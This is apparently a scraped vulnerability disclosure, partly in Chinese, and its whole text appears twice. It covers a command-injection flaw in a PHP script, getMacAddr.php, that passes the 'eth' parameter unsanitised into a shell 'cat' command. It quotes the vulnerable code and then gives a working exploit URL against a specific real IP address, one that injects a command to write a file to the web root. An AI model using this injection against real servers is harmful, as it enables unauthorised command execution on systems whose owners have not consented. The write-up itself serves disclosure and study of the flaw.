VULHUB ™

getMacAddr.php: code 区域 ``` <?php include_once dirname(__FILE__).'/../common/commandWrapper.inc'; $tmpeth = $_GET['eth']; $tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth)); echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="mac" id="mac" value="'.$tmpmacAddr.'" >'; ?> ``` 跟进getMacAddrFromIfName code 区域 ``` function getMacAddrFromIfName($ifName){ $mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output'); if($mac != null && $mac != '') return $mac[0]; else return ''; } ``` http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php | 访问http://218.206.217.19:8080/acc/network/c.php 即可

getMacAddr.php: code 区域 ``` <?php include_once dirname(__FILE__).'/../common/commandWrapper.inc'; $tmpeth = $_GET['eth']; $tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth)); echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="mac" id="mac" value="'.$tmpmacAddr.'" >'; ?> ``` 跟进getMacAddrFromIfName code 区域 ``` function getMacAddrFromIfName($ifName){ $mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output'); if($mac != null && $mac != '') return $mac[0]; else return ''; } ``` http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php | 访问http://218.206.217.19:8080/acc/network/c.php 即可